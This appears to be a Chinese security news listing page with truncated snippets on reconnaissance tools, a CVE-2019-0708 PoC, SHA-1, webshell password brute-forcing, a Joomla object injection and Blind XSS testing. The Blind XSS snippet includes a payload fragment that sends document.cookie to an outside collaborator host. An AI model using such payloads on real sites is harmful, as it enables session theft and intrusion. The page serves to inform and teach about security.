10 04月 行业热点 web渗透信息侦察收集工具——Recon-ng 查看需要设置的参数show advanced 列出所有高级配置选项 mso-hansi-font-family:"Times New Roman";mso-fareast-language:ZH-CN
22 05月 行业热点 漏洞原理CVE-2019-0708-PoC-Hitting-Path Server 2008 R2和Windows Server 2008相关补丁更新可以参考《Microsoft安全更新指南》,访问地址:https://portal.msrc.microsoft.com/zh-cn
24 02月 行业热点 Google宣布攻破SHA-1,从此SHA-1不再安全! 谷歌公司多年来一直主张弃用SHA-1方案特别是在TLS证书签署等场景之下。早在2014年,Chrome小组就宣布将逐渐淘汰对SHA-1的使用。
03 03月 行业热点 想用好云?先看看这10条安全建议 这包括在传输时和平时都利用防火墙和SSL/TLS协议对文件进行高级加密。 5. 用多因子身份验证保证口令安全 一大批数据泄露都是口令使用疏忽的结果。口令应是定制的,且包含有宽泛的配置选择。
28 04月 行业热点 Webshell密码极速爆破工具 – cheetah update.py 更新模块 │ url.list 默认指定批量 webshell url文件 │ user-agent.list 用户代理文件
20 03月 行业热点 joomla对象注入漏洞 ;b:1;}ð Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn
13 04月 行业热点 关于Microsoft Office Word存在代码执行漏洞攻击威胁的安全公告 critical-office-zero-day-attacks-detected-wild/ http://thehackernews.com/2017/04/microsoft-word-zero-day.html http://www.cnvd.org.cn
17 04月 行业热点 如何通过BurpSuite检测Blind XSS漏洞 b3fi8t28zwu2wbhmd5qgmx34vv1sph.burpcollaborator.net/leak-"+document.cookie,a')} 这一次,我便接收到了“connect.sid” cookie: 接下来,我在代理工具